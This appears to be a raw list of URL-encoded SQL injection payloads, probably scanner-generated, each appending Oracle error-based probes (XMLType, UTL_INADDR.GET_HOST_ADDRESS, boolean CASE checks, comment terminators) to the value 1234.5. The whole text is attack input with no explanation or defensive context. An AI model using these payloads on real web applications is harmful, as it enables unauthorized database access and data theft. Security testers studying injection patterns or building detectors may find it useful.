1234.5%27%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27NrPp%27%20LIKE%20%27NrPp 1234.5%27%29%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27cqzI%27%20LIKE%20%27cqzI 1234.5%27%29%29%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27GgdW%27%20LIKE%20%27GgdW 1234.5%27%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27WheN%27%20LIKE%20%27WheN 1234.5%22%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22tQPa%22%3D%22tQPa 1234.5%22%29%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22esSI%22%3D%22esSI 1234.5%22%29%29%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22obDD%22%3D%22obDD 1234.5%22%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22FEVi%22%3D%22FEVi 1234.5%22%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22xhFx%22%20LIKE%20%22xhFx 1234.5%22%29%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22raxw%22%20LIKE%20%22raxw 1234.5%22%29%29%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22rfJQ%22%20LIKE%20%22rfJQ 1234.5%22%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22BqpY%22%20LIKE%20%22BqpY 1234.5%25%27%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27zkCe%27%3D%27zkCe 1234.5%00%27%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27wDBd%27%3D%27wDBd 1234.5%27%29%20WHERE%202744%3D2744%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 1234.5%22%29%20WHERE%203008%3D3008%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 1234.5%29%20WHERE%205569%3D5569%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 1234.5%27%20WHERE%204213%3D4213%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 1234.5%22%20WHERE%205929%3D5929%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 1234.5%20WHERE%206231%3D6231%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27WPiX%27%20FROM%20DUAL%20WHERE%208884%3D8884%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27DsXF%27%20WHERE%207038%3D7038%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20XbCr%20WHERE%208685%3D8685%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27TPII%27%20WHERE%206850%3D6850%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%204306%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284306%3D4306%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20%23 1234.5%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 1234.5%27%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 1234.5%27%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 1234.5%22%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 1234.5%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%288525%3D8525 1234.5%29%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%289404%3D9404 1234.5%29%29%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%281493%3D1493 1234.5%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 1234.5%27%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%27brZS%27%3D%27brZS 1234.5%27%29%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27WThU%27%3D%27WThU 1234.5%27%29%29%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27exlE%27%3D%27exlE 1234.5%27%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%27BoQt%27%3D%27BoQt 1234.5%27%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%27jMyM%27%20LIKE%20%27jMyM 1234.5%27%29%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27IQkL%27%20LIKE%20%27IQkL 1234.5%27%29%29%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27sgmj%27%20LIKE%20%27sgmj 1234.5%27%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%27qgBg%27%20LIKE%20%27qgBg 1234.5%22%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%22KDOm%22%3D%22KDOm 1234.5%22%29%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22eYKt%22%3D%22eYKt 1234.5%22%29%29%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22SFPf%22%3D%22SFPf 1234.5%22%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%22SHBg%22%3D%22SHBg 1234.5%22%29%20AND%205740%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285740%3D5740%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%22gghy%22%20LIKE%20%22gghy 